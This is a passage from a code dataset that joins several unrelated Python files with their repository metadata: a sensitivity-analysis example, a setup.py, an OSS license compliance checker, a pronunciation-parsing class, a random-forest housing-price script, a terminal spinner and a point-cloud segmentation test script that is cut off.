List of :meth:`calibration-class<aixcalibuha.data_types.CalibrationClass>`
objects to be analyzed.
:return: A list calibration classes
:rtype: list
"""
# Setup the class
sen_analyzer = SobolAnalyzer(
sim_api=sim_api,
num_samples=10,
cd=sim_api.cd,
analysis_variable='S1'
)
result, classes = sen_analyzer.run(calibration_classes=cal_classes)
print("Result of the sensitivity analysis")
print(result)
print("Selecting relevant tuner-parameters using a fixed threshold:")
sen_analyzer.select_by_threshold(calibration_classes=cal_classes,
result=result,
threshold=0.01)
for cal_class in cal_classes:
print(f"Class '{cal_class.name}' with parameters:\n{cal_class.tuner_paras}")
return classes
if __name__ == "__main__":
from examples import setup_fmu, setup_calibration_classes
# Parameters for sen-analysis:
EXAMPLE = "B" # Or choose A
SIM_API = setup_fmu(example=EXAMPLE)
CALIBRATION_CLASSES = setup_calibration_classes(example=EXAMPLE)[0]
# Sensitivity analysis:
CALIBRATION_CLASSES = run_sensitivity_analysis(sim_api=SIM_API,
cal_classes=CALIBRATION_CLASSES)
| 38.015873 | 89 | 0.699791 | 303 | 2,395 | 5.356436 | 0.39934 | 0.029575 | 0.012323 | 0.030807 | 0.034504 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005495 | 0.240084 | 2,395 | 62 | 90 | 38.629032 | 0.886264 | 0.473069 | 0 | 0 | 0 | 0 | 0.144915 | 0.030508 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.08 | 0 | 0.16 | 0.16 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df91d1ada3f3d05c025daba9488ddff7b71f714b | 1,985 | py | Python | setup.py | seek-ai/esengine | 5e17c5fa9b6990963e3e61e6010ce7c177c9b2c5 | [
"MIT"
] | 53 | 2017-04-29T16:39:13.000Z | 2022-01-25T23:46:31.000Z | setup.py | seek-ai/esengine | 5e17c5fa9b6990963e3e61e6010ce7c177c9b2c5 | [
"MIT"
] | 9 | 2017-11-22T18:22:17.000Z | 2020-06-05T19:26:07.000Z | setup.py | seek-ai/esengine | 5e17c5fa9b6990963e3e61e6010ce7c177c9b2c5 | [
"MIT"
] | 13 | 2017-10-27T13:44:04.000Z | 2021-02-28T12:33:04.000Z | # coding: utf-8
import os
import re
try:
from setuptools import setup, find_packages
except ImportError:
from distutils.core import setup, find_packages
try:
import pypandoc
long_description = pypandoc.convert('README.md', 'rst')
except (IOError, ImportError):
long_description = "Elasticsearch ODM inspired on MongoEngine"
def fpath(name):
return os.path.join(os.path.dirname(__file__), name)
def read(fname):
return open(fpath(fname)).read()
# grep eseengine/__init__.py since python 3.x cannot import it
file_text = read(fpath('esengine/__init__.py'))
def grep(attrname):
pattern = r"{0}\W*=\W*'([^']+)'".format(attrname)
strval, = re.findall(pattern, file_text)
return strval
setup(
name='esengine',
version=grep('__version__'),
url='https://github.com/seek-ai/esengine',
license='MIT',
author="Catholabs",
author_email="catholabs@catho.com",
description='Elasticsearch ODM inspired on MongoEngine',
long_description=long_description,
packages=find_packages(),
include_package_data=True,
zip_safe=False,
platforms='any',
extras_require={
"es0": ["elasticsearch<1.0.0"],
"es1": ["elasticsearch>=1.0.0,<2.0.0"],
"es2": ["elasticsearch>=2.0.0,<3.0.0"]
},
install_requires=["python-dateutil", "six==1.10.0"],
tests_require=[
"pytest==2.8.3",
"pytest-cov==2.2.0",
"flake8==2.5.0",
"pep8-naming==0.3.3",
"flake8-debugger==1.4.0",
"flake8-print==2.0.1",
"flake8-todo==0.4",
"radon==1.2.2"
],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
]
)
| 26.824324 | 66 | 0.617632 | 246 | 1,985 | 4.853659 | 0.495935 | 0.008375 | 0.062814 | 0.065327 | 0.080402 | 0.080402 | 0 | 0 | 0 | 0 | 0 | 0.038015 | 0.218136 | 1,985 | 73 | 67 | 27.191781 | 0.731314 | 0.03728 | 0 | 0.033333 | 0 | 0 | 0.380503 | 0.039832 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.116667 | 0.033333 | 0.216667 | 0.016667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df91f102ccd7ef11d324316885afcaaad8f975b0 | 9,350 | py | Python | oss-compliance/check-oss-licenses.py | rickibm/daml | 679d42a21bce320e11ccbba77fbb8d29a2b38db9 | [
"Apache-2.0"
] | null | null | null | oss-compliance/check-oss-licenses.py | rickibm/daml | 679d42a21bce320e11ccbba77fbb8d29a2b38db9 | [
"Apache-2.0"
] | null | null | null | oss-compliance/check-oss-licenses.py | rickibm/daml | 679d42a21bce320e11ccbba77fbb8d29a2b38db9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env runpipenv
# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
import os
import xml.etree.ElementTree as ET
import sys
import csv
import re
import argparse
import os.path
NO_LICENSE = 'No license information available'
STRIP_PATTERN = ' \t\n\r'
LICENSES_WHITE_LIST_FILE = 'LICENSES_WHITE_LIST.csv'
PACKAGES_WHITE_LIST_FILE = 'PACKAGES_WHITE_LIST.csv'
WHITE_LISTED_LICENSES = []
WHITE_LISTED_PACKAGES = []
def load_white_listed_licenses(white_listed_licenses_file):
script_dir = os.path.dirname(__file__)
print("Loading %s" % white_listed_licenses_file)
white_listed_licenses = []
with open(os.path.join(script_dir, white_listed_licenses_file)) as csvfile:
oss_white_lists = csv.DictReader(csvfile, delimiter=',', quotechar='"')
for row in oss_white_lists:
white_listed_licenses.append(
{'license detail': row['license detail'],
'license group': row['license group'],
'info': row['info']})
print("White listed licenses: %s" % white_listed_licenses)
return white_listed_licenses
def load_white_listed_packages(white_listed_packages_file):
script_dir = os.path.dirname(__file__)
print("Loading %s" % white_listed_packages_file)
white_listed_packages = []
with open(os.path.join(script_dir, white_listed_packages_file)) as csvfile:
packages_white_lists = csv.DictReader(csvfile, delimiter=',', quotechar='"')
for row in packages_white_lists:
white_listed_packages.append(
{'language': row['language'],
'package': row['package'],
'info': row['info']})
print("White listed packages: %s" % white_listed_packages)
return white_listed_packages
def enrich_dependency_with_compliance(dependency):
compliance = is_dependency_compliant(dependency, WHITE_LISTED_LICENSES, WHITE_LISTED_PACKAGES)
dependency.update(
{'is_compliant': compliance['is_compliant'],
'additional_info': compliance['additional_info']})
return dependency
def retrieve_java_dependency_licenses(dependency):
licenses = []
for license in dependency.find('licenses').findall('license'):
license_name = license.find('name').text
license_url = license.find('url').text if license.find('url') is not None else 'Not Available'
licenses.append({'license_name': license_name, 'license_url': license_url})
if not licenses:
licenses.append({'license_name': NO_LICENSE, 'license_url': ''})
return licenses
def retrieve_java_dependencies(maven_file):
root = ET.parse(maven_file).getroot()
dependencies = []
for dependency in root.iter('dependency'):
group_id = dependency.find('groupId').text
artifact_id = dependency.find('artifactId').text
version = dependency.find('version').text
java_dependency = {
'language': 'java',
'package': group_id,
'artifact': artifact_id,
'version': version,
'licenses': retrieve_java_dependency_licenses(dependency),
}
dependencies.append(enrich_dependency_with_compliance(java_dependency))
return dependencies
def read_csv_file(filename):
with open(filename, 'rb') as csvfile:
print(csvfile.name)
reader = csv.reader(csvfile, quoting=csv.QUOTE_MINIMAL, strict=True, delimiter=",")
reader.next()
csv_list = list(reader)
dependencies = []
for row in csv_list:
dependency = convert_row(row)
dependencies.append(enrich_dependency_with_compliance(dependency))
return dependencies
def convert_row(row):
name = row[2]
license_match = re.search('["]?(.*)[(](.*)[)]', row[1])
if license_match:
license_url = license_match.group(2)
license_name = license_match.group(1).strip()
name_match = re.search('(.*) # (.*) # (.*)', name)
if name_match:
name_path = name_match.group(1).strip()
name_lib = name_match.group(2).strip()
name_version = name_match.group(3).strip()
else:
# print "ERROR: Could not parse library name %s" % name
sys.exit(1)
return {
'category': row[0],
'language': "Java",
'licenses': [{'license_name': license_name, 'license_url': license_url}],
'artifact': name_lib,
'package': name_path,
'version': name_version
}
def save_dependencies_as_csv(dependencies, output_file):
csv_file = open(output_file, 'w')
csv_file.write("compliant,language,package,artifact,version,license_name,license_url\n")
for dependency in dependencies:
for license in dependency['licenses']:
csv_line = "\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\"\n" % (
dependency['is_compliant'],
dependency['language'],
dependency['package'],
dependency['artifact'],
dependency['version'],
license['license_name'],
license['license_url'],
dependency['additional_info'])
csv_file.write(csv_line)
csv_file.close()
def is_package_white_listed(package, white_listed_packages):
for white_listed_package in white_listed_packages:
if white_listed_package['package'].strip(STRIP_PATTERN) in package.strip(STRIP_PATTERN):
return {'is_white_listed': True,
'additional_info': white_listed_package['info'],
'type': 'package'}
return {'is_white_listed': False}
def is_license_white_listed(licenses, white_listed_licenses):
for license in licenses:
for white_listed_license in white_listed_licenses:
if white_listed_license['license detail'].strip(STRIP_PATTERN).lower() == license['license_name'].strip(
STRIP_PATTERN).lower():
return {'is_white_listed': True,
'additional_info': white_listed_license['info'],
'type': 'license'}
return {'is_white_listed': False}
def is_dependency_compliant(dependency, white_listed_licenses, white_listed_packages):
license = is_license_white_listed(dependency['licenses'], white_listed_licenses)
package = is_package_white_listed(dependency['package'], white_listed_packages)
if license['is_white_listed']:
return {'is_compliant': True, 'additional_info': license['additional_info']}
elif package['is_white_listed']:
return {'is_compliant': True, 'additional_info': package['additional_info']}
else:
return {'is_compliant': False, 'additional_info': 'not found'}
def retrieve_all_dependencies(java_dependencies_file, java_dependencies_format):
print('Parsing java dependencies file: %s:' % java_dependencies_file)
java_dependencies = {}
if java_dependencies_format == "XML":
java_dependencies = retrieve_java_dependencies(java_dependencies_file)
if java_dependencies_format == "CSV":
java_dependencies = read_csv_file(java_dependencies_file)
return java_dependencies
def should_fail_build(dependencies):
should_fail = False
print("Analyzing the list of dependencies ...\n")
for dependency in dependencies:
if not dependency['is_compliant']:
print("Dependency %s:%s:%s is not compliant " % (
dependency['language'], dependency['package'], dependency['artifact']))
should_fail = True
return should_fail
def args_parsing():
parser = argparse.ArgumentParser(description='Validate the license for 3rd party libraries')
parser.add_argument('--java-deps', dest='java_dependencies_file', required=True,
help='generated by mvn license plugin')
parser.add_argument('--fail-build', dest='fail_build', required=False, default='yes',
help='fail build if no compliant dependencies are found (yes / no, default is yes)')
parser.add_argument('--java-deps-format', dest='java_dependencies_format', required=True,
help='format of dependencies file (CSV or XML)')
return parser.parse_args(sys.argv[1:])
def main(inner_args):
all_dependencies = retrieve_all_dependencies(inner_args.java_dependencies_file, inner_args.java_dependencies_format)
all_dependencies_file = 'oss_license_compliance_report_%s.csv' % inner_args.java_dependencies_file.replace('/','-').replace('.','')
print('Saving all dependencies as %s' % all_dependencies_file)
save_dependencies_as_csv(all_dependencies, "cache/" + all_dependencies_file)
if should_fail_build(all_dependencies):
print("\nAt least one of the dependencies is not compliant - please see %s for more info" % all_dependencies_file)
print("\nYou can filter the dependencies by the 'Compliant' column")
if inner_args.fail_build == 'yes':
print("--fail-build set to 'yes', returning an error code")
sys.exit(1)
print('*** OSS Licenses Check')
args = args_parsing()
WHITE_LISTED_LICENSES = load_white_listed_licenses(LICENSES_WHITE_LIST_FILE)
WHITE_LISTED_PACKAGES = load_white_listed_packages(PACKAGES_WHITE_LIST_FILE)
main(args)
| 40.652174 | 135 | 0.673904 | 1,098 | 9,350 | 5.442623 | 0.173042 | 0.092035 | 0.057229 | 0.02008 | 0.262383 | 0.194444 | 0.150268 | 0.118809 | 0.104752 | 0.059906 | 0 | 0.002435 | 0.209305 | 9,350 | 229 | 136 | 40.829694 | 0.805897 | 0.022353 | 0 | 0.097297 | 0 | 0 | 0.198424 | 0.02167 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081081 | false | 0 | 0.037838 | 0 | 0.210811 | 0.07027 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10bfed5cbc51ad7c7539fdeda3a165f6867a4380 | 2,791 | py | Python | poetics/classes/word.py | M-R-Epstein/poetics | 6331517c22ca567b9c68e2c668f670855e2ba618 | [
"MIT"
] | 4 | 2019-02-21T20:53:57.000Z | 2022-03-12T16:36:02.000Z | poetics/classes/word.py | M-R-Epstein/poetics | 6331517c22ca567b9c68e2c668f670855e2ba618 | [
"MIT"
] | 1 | 2019-02-19T14:37:29.000Z | 2019-02-19T14:37:29.000Z | poetics/classes/word.py | M-R-Epstein/poetics | 6331517c22ca567b9c68e2c668f670855e2ba618 | [
"MIT"
] | null | null | null | import logging
from poetics.lookups import get_pronunciations, check_onomatopoetic
from poetics.classes.pronunciation import Pronunciation
from poetics.stemmer import stem
class Word:
def __init__(self, word, user_pronunciation=None, parent=None):
self.parent = parent
self.token = word
self.stem = stem(word)
self.pronunciations = None
self.onomatopoetic = check_onomatopoetic(word)
# Deal with user provided pronunciations.
if user_pronunciation:
vowels = ['AA', 'AE', 'AH', 'AO', 'AW', 'AX', 'AY', 'EH', 'ER', 'EY', 'IH', 'IX', 'IY', 'OW', 'OY', 'UH',
'UW']
logging.info("Pronunciation for \"%s\" provided as \"%s\"", word, user_pronunciation)
out_pronunciation = []
f_pronunciations = []
syllables = user_pronunciation.split('-')
for syllable in syllables:
syllable_out = ["", "", "", ""]
strip = syllable.strip()
if "1" in strip:
syllable_out[0] = 1
strip = strip.replace("1", "")
else:
syllable_out[0] = 0
strip = strip.replace("2", "")
split = strip.split()
onset = []
coda = []
try:
nucleus = next(phoneme for phoneme in split if phoneme in vowels)
syllable_out[2] = nucleus
nucleus_index = split.index(nucleus)
for phoneme in split[:nucleus_index]:
onset.append(phoneme)
syllable_out[1] = ' '.join(onset)
for phoneme in split[nucleus_index + 1:]:
coda.append(phoneme)
syllable_out[3] = ' '.join(coda)
except StopIteration:
for phoneme in split:
onset.append(phoneme)
syllable_out[1] = ' '.join(onset)
out_pronunciation.append(syllable_out)
f_pronunciations.append(Pronunciation(out_pronunciation, self))
self.pronunciations = tuple(f_pronunciations)
# If there isn't a user provided pronunciation, get a pronunciation.
else:
f_pronunciations = []
pronunciations = get_pronunciations(word)
if pronunciations:
for pronunciation in pronunciations:
f_pronunciations.append(Pronunciation(pronunciation, self))
self.pronunciations = tuple(f_pronunciations)
def __str__(self) -> str:
return self.token
def __repr__(self) -> str:
return '%s (%s)' % (super().__repr__(), self.token)
| 41.656716 | 117 | 0.52741 | 264 | 2,791 | 5.409091 | 0.306818 | 0.061625 | 0.033613 | 0.047619 | 0.172269 | 0.172269 | 0.131653 | 0.054622 | 0 | 0 | 0 | 0.006814 | 0.369043 | 2,791 | 66 | 118 | 42.287879 | 0.804089 | 0.037979 | 0 | 0.172414 | 0 | 0 | 0.030201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051724 | false | 0 | 0.068966 | 0.034483 | 0.172414 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c26729944d8e47d9f5c6b192937359e48e63ef | 4,584 | py | Python | housing_prices_kaggle/results/2020-04-29/runall.py | be2112/modeling_projects | db870ad684d31f1c95b66a782c8bbffacb55c352 | [
"MIT"
] | null | null | null | housing_prices_kaggle/results/2020-04-29/runall.py | be2112/modeling_projects | db870ad684d31f1c95b66a782c8bbffacb55c352 | [
"MIT"
] | null | null | null | housing_prices_kaggle/results/2020-04-29/runall.py | be2112/modeling_projects | db870ad684d31f1c95b66a782c8bbffacb55c352 | [
"MIT"
] | null | null | null | # runall.py
from collections import OrderedDict
from sklearn.ensemble import RandomForestRegressor
from sklearn.impute import SimpleImputer
from sklearn.model_selection import ShuffleSplit
from sklearn.pipeline import Pipeline
from sklearn.pipeline import make_pipeline, FeatureUnion
from sklearn.preprocessing import OneHotEncoder
from lib_bre import *
from lib_bre import ColumnSelector, TypeSelector, CategoricalEncoder
# Load training data
data_file = get_dataset_file_path('2020-04-13', 'train.csv')
train = pd.read_csv(data_file)
# Remove label
X_train = train.drop(columns='SalePrice')
y_train = train['SalePrice'].copy()
# Variables to use in the model
x_cols = ['MSSubClass', 'MSZoning', 'LotFrontage', 'LotArea', 'Street', 'LotShape', 'LandContour', 'Utilities',
'LotConfig', 'LandSlope', 'Neighborhood', 'Condition1', 'Condition2', 'BldgType', 'HouseStyle', 'OverallQual',
'OverallCond', 'YearBuilt', 'YearRemodAdd', 'RoofStyle', 'RoofMatl', 'Exterior1st', 'Exterior2nd',
'MasVnrType', 'MasVnrArea', 'ExterQual', 'ExterCond', 'Foundation', 'BsmtQual', 'BsmtCond', 'BsmtExposure',
'BsmtFinType1', 'BsmtFinSF1', 'BsmtFinType2', 'BsmtFinSF2', 'BsmtUnfSF', 'TotalBsmtSF', 'Heating',
'HeatingQC', 'CentralAir', 'Electrical', '1stFlrSF', '2ndFlrSF', 'LowQualFinSF', 'GrLivArea', 'BsmtFullBath',
'BsmtHalfBath', 'FullBath', 'HalfBath', 'BedroomAbvGr', 'KitchenAbvGr', 'KitchenQual', 'TotRmsAbvGrd',
'Functional', 'Fireplaces', 'GarageType', 'GarageYrBlt', 'GarageFinish', 'GarageCars', 'GarageArea',
'GarageQual', 'GarageCond', 'PavedDrive', 'WoodDeckSF', 'OpenPorchSF', 'EnclosedPorch', '3SsnPorch',
'ScreenPorch', 'PoolArea', 'MiscVal', 'MoSold', 'YrSold', 'SaleType', 'SaleCondition']
# Build preprocessing pipeline
preprocess_pipeline = make_pipeline(
ColumnSelector(columns=x_cols),
CategoricalEncoder(),
FeatureUnion(transformer_list=[
("numeric_features", make_pipeline(
TypeSelector(np.number),
SimpleImputer(missing_values=np.nan, strategy='median'),
)),
("categorical_features", make_pipeline(
TypeSelector("category"),
SimpleImputer(strategy="most_frequent"),
OneHotEncoder()
))
])
)
log2_forest = Pipeline(steps=[
('preprocess', preprocess_pipeline),
('decision_tree',
RandomForestRegressor(warm_start=True, max_features='log2', max_depth=20, oob_score=True, random_state=79,
n_jobs=-1))
])
sqrt_forest = Pipeline(steps=[
('preprocess', preprocess_pipeline),
('decision_tree',
RandomForestRegressor(warm_start=True, max_features='sqrt', max_depth=20, oob_score=True, random_state=79,
n_jobs=-1))
])
auto_forest = Pipeline(steps=[
('preprocess', preprocess_pipeline),
('decision_tree',
RandomForestRegressor(warm_start=True, max_features='auto', max_depth=20, oob_score=True, random_state=79,
n_jobs=-1))
])
ensemble_regressors = [
("RandomForestRegressor, max_features=log2", log2_forest),
("RandomForestRegressor, max_features=sqrt", sqrt_forest),
("RandomForestRegressor, max_features=auto", auto_forest),
]
error_rate = OrderedDict((label, []) for label, _ in ensemble_regressors)
# range of 'n_trees' to explore'
min_trees = 20
max_trees = 200
for label, reg in ensemble_regressors:
for i in range(min_trees, max_trees + 1):
reg.steps[1][1].set_params(n_estimators=i)
reg.fit(X_train, y_train)
oob_error = 1 - reg.steps[1][1].oob_score_
error_rate[label].append((i, oob_error))
# Generate test error vs n_trees plot
for label, clf_err in error_rate.items():
xs, ys = zip(*clf_err)
plt.plot(xs, ys, label=label)
plt.xlim(min_trees, max_trees)
plt.xlabel("n_estimators")
plt.ylabel("OOB error rate")
plt.legend(loc="upper right")
plt.savefig('test_errors.png', dpi=100)
plt.show()
# %%
# Plot Learning Curve for Best Model
fig, axes = plt.subplots(3, 1, figsize=(10, 15))
title = "Learning Curves (Random Forest Regressor, max_features=auto, max_depth=20)"
cv = ShuffleSplit(n_splits=10, test_size=0.2, random_state=34)
X_train = preprocess_pipeline.fit_transform(X_train)
estimator = RandomForestRegressor(warm_start=True, max_features='auto', max_depth=20, oob_score=True, n_estimators=200,
random_state=79, n_jobs=-1)
plot_learning_curve(estimator, title, X_train, y_train, axes=axes, ylim=(0.6, 1.01))
plt.savefig('learning_curve.svg')
| 39.86087 | 120 | 0.695462 | 522 | 4,584 | 5.908046 | 0.440613 | 0.028534 | 0.016213 | 0.044099 | 0.18677 | 0.179637 | 0.16537 | 0.16537 | 0.16537 | 0.16537 | 0 | 0.020708 | 0.167757 | 4,584 | 114 | 121 | 40.210526 | 0.78768 | 0.044721 | 0 | 0.149425 | 0 | 0 | 0.268711 | 0.015106 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.103448 | 0 | 0.103448 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c2820d996e4ee29bd411bddd15d40dc887279b | 1,235 | py | Python | colourz/spinners.py | alexmacniven/colour | 3565f1da670bcc26858db52db6bee40c06f29f9a | [
"MIT"
] | null | null | null | colourz/spinners.py | alexmacniven/colour | 3565f1da670bcc26858db52db6bee40c06f29f9a | [
"MIT"
] | 2 | 2019-04-03T14:54:31.000Z | 2020-03-24T16:27:48.000Z | colourz/spinners.py | alexmacniven/colour | 3565f1da670bcc26858db52db6bee40c06f29f9a | [
"MIT"
] | 1 | 2019-03-21T14:06:23.000Z | 2019-03-21T14:06:23.000Z | import sys
import threading
import time
class Bullets:
@staticmethod
def spinning_cursor():
c = [
"[- ]",
"[ - ]",
"[ - ]",
"[ - ]",
"[ -]",
"[ - ]",
"[ - ]",
"[ - ]"
]
while 1:
for cursor in c:
yield cursor
def __init__(self, msg="Working on it..."):
self.spinner_generator = self.spinning_cursor()
self.busy = False
self.delay = 0.1
self.msg = msg
self.linelen = len(msg) + 8
def spinner_task(self):
while self.busy:
sys.stdout.write(
"{0} {1}".format(
next(self.spinner_generator),
self.msg
)
)
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\r')
sys.stdout.flush()
def start(self):
self.busy = True
threading.Thread(target=self.spinner_task).start()
def stop(self):
self.busy = False
time.sleep(self.delay)
spacers = " " * self.linelen
sys.stdout.write("\r{0}\r".format(spacers))
| 23.301887 | 58 | 0.42915 | 116 | 1,235 | 4.482759 | 0.387931 | 0.086538 | 0.080769 | 0.092308 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010057 | 0.436437 | 1,235 | 52 | 59 | 23.75 | 0.737069 | 0 | 0 | 0.288889 | 0 | 0 | 0.072065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
10c3b9550e1437e1be83b2829d5baa30281f891a | 9,785 | py | Python | Spatial-Transformer-PCD/sampling-based/splatnet/semseg3d/test.py | tamaslevente/trai | 4bf68463b941f305d9b25a9374b6c2a2d51a8046 | [
"MIT"
] | null | null | null | Spatial-Transformer-PCD/sampling-based/splatnet/semseg3d/test.py | tamaslevente/trai | 4bf68463b941f305d9b25a9374b6c2a2d51a8046 | [
"MIT"
] | null | null | null | Spatial-Transformer-PCD/sampling-based/splatnet/semseg3d/test.py | tamaslevente/trai | 4bf68463b941f305d9b25a9374b6c2a2d51a8046 | [
"MIT"
] | null | null | null | """
Copyright (C) 2018 NVIDIA Corporation. All rights reserved.
Licensed under the CC BY-NC-SA 4.0 license (https://creativecommons.org/licenses/by-nc-sa/4.0/legalcode).
"""
import os
import glob
import argparse
import time
import numpy as np
import caffe
import splatnet.configs
from splatnet.utils import modify_blob_shape
from splatnet import plot_log
import splatnet.configs
EVAL_SCRIPT_PATH = os.path.join(splatnet.configs.ROOT_DIR, 'splatnet', 'semseg3d', 'eval_seg.py')
def extract_feat_scene(network_path, weights_path, feed, out_names, batch_size=1, sample_size=-1):
net = caffe.Net(network_path, weights_path, caffe.TEST)
net_bs, _, _, net_ss = net.blobs[list(feed.keys())[0]].data.shape
npt = list(feed.values())[0].shape[-1]
if sample_size == -1:
sample_size = npt
elif sample_size == 0:
sample_size = net_ss
else:
assert sample_size * batch_size <= npt
if net_bs != batch_size or net_ss != sample_size:
network_path = modify_blob_shape(network_path, feed.keys(), {0: batch_size, 3: sample_size})
net = caffe.Net(network_path, weights_path, caffe.TEST)
if type(out_names) == str:
out_names = (out_names,)
single_target = True
else:
single_target = False
outs = {v: [] for v in out_names}
pts_per_batch = batch_size * sample_size
for b in range(int(np.ceil(npt / pts_per_batch))):
b_end = min(pts_per_batch * (b + 1), npt)
b_slice = slice(b_end - pts_per_batch, b_end)
bs = min(pts_per_batch, npt - pts_per_batch * b)
for in_key in feed:
net.blobs[in_key].data[...] \
= feed[in_key][:, :, :, b_slice].reshape(-1, batch_size, sample_size, 1).transpose(1, 0, 3, 2)
net.forward()
for out_key in out_names:
out_sz = net.blobs[out_key].data.shape
out = net.blobs[out_key].data.transpose(1, 2, 0, 3).reshape(1, out_sz[1], out_sz[2], -1)[:, :, :, -bs:]
outs[out_key].append(out.copy())
result = {v: np.concatenate(outs[v], axis=3) for v in out_names}
if single_target:
result = result[out_names[0]]
return result
def semseg_test(dataset, network, weights, input_dims='nx_ny_nz_r_g_b_h', sample_size=-1,
dataset_params=None, save_dir='', save_prefix='', use_cpu=False):
"""
Testing trained semantic segmentation network
:param dataset: choices: 'facade', 'stanford3d'
:param network: path to a .prototxt file
:param weights: path to a .caffemodel file
:param input_dims: feat dims and scales
:param sample_size: -1 -- use all points in a single sample, 0 -- use the size in network
:param dataset_params: a dict with optional dataset parameters
:param save_dir: default ''
:param save_prefix: default ''
:param use_cpu: default False
:return:
"""
if use_cpu:
caffe.set_mode_cpu()
else:
caffe.set_mode_gpu()
caffe.set_device(0)
# dataset specific: data, xyz, cmap
if dataset == 'facade':
from splatnet.dataset import dataset_facade
dataset_params_new = {} if not dataset_params else dataset_params
dataset_params = dict(subset='test', val_ratio=0.0) # default values
dataset_params.update(dataset_params_new)
for v in {'val_ratio'}:
if v in dataset_params:
dataset_params[v] = float(dataset_params[v])
data, xyz, norms = dataset_facade.points(dims=input_dims+',x_y_z,nx_ny_nz', **dataset_params)
cmap = splatnet.configs.FACADE_CMAP
elif dataset == 'stanford3d':
norms = None
pass # TODO set cmap, data, xyz
else:
raise ValueError('Unsupported dataset: {}'.format(dataset))
tic = time.time()
prob = extract_feat_scene(network, weights,
feed=dict(data=data.transpose().reshape(1, -1, 1, len(data))),
out_names='prob',
sample_size=sample_size)
elapsed = time.time() - tic
pred = prob.argmax(axis=1).squeeze()
if norms is None:
out = np.array([np.concatenate((x, cmap[int(c)]), axis=0) for (x, c) in zip(xyz, pred)])
header = '''ply
format ascii 1.0
element vertex {}
property float x
property float y
property float z
property uchar diffuse_red
property uchar diffuse_green
property uchar diffuse_blue
end_header'''.format(len(data))
fmt = '%.6f %.6f %.6f %d %d %d'
else:
out = np.array([np.concatenate((x, n, cmap[int(c)]), axis=0) for (x, n, c) in zip(xyz, norms, pred)])
header = '''ply
format ascii 1.0
element vertex {}
property float x
property float y
property float z
property float nx
property float ny
property float nz
property uchar diffuse_red
property uchar diffuse_green
property uchar diffuse_blue
end_header'''.format(len(data))
fmt = '%.6f %.6f %.6f %.6f %.6f %.6f %d %d %d'
save_path = os.path.join(save_dir, '{}pred_{}.ply'.format(save_prefix, dataset_params['subset']))
np.savetxt(save_path, out, fmt=fmt, header=header, comments='')
return save_path, elapsed, len(data)
if __name__ == '__main__':
parser = argparse.ArgumentParser(add_help=False)
group = parser.add_argument_group('testing options')
group.add_argument('dataset')
group.add_argument('--dataset_params', nargs='+', help='dataset-specific parameters (key value pairs)')
group.add_argument('--input', default='nx_ny_nz_r_g_b_h', help='features to use as input')
group.add_argument('--cpu', action='store_true', help='use cpu')
group.add_argument('--exp_dir', default=None, type=str, help='together with exp_prefix, set defaults to args below')
group.add_argument('--exp_prefix', default='', type=str, help='together with exp_dir, set defaults to args below')
group.add_argument('--network', default=None, type=str, help='a .prototxt file')
group.add_argument('--weights', default=None, type=str, help='a .caffemodel file')
group.add_argument('--sample_size', default=-1, type=int, help='testing sample size')
group.add_argument('--log', default=None, type=str, help='a .log file with training logs')
group.add_argument('--log_eval', default=None, type=str, help='path to write evaluation logs')
group.add_argument('--save_dir', default=None, type=str, help='together with save_prefix, a place for predictions')
group.add_argument('--save_prefix', default=None, type=str, help='together with save_dir, a place for predictions')
group = parser.add_argument_group('evaluation options')
group.add_argument('--gt', default=None, type=str, help='path to ground-truth')
group.add_argument('--gt_rgb', action='store_true', help='turn this on if gt is encoded with rgb values')
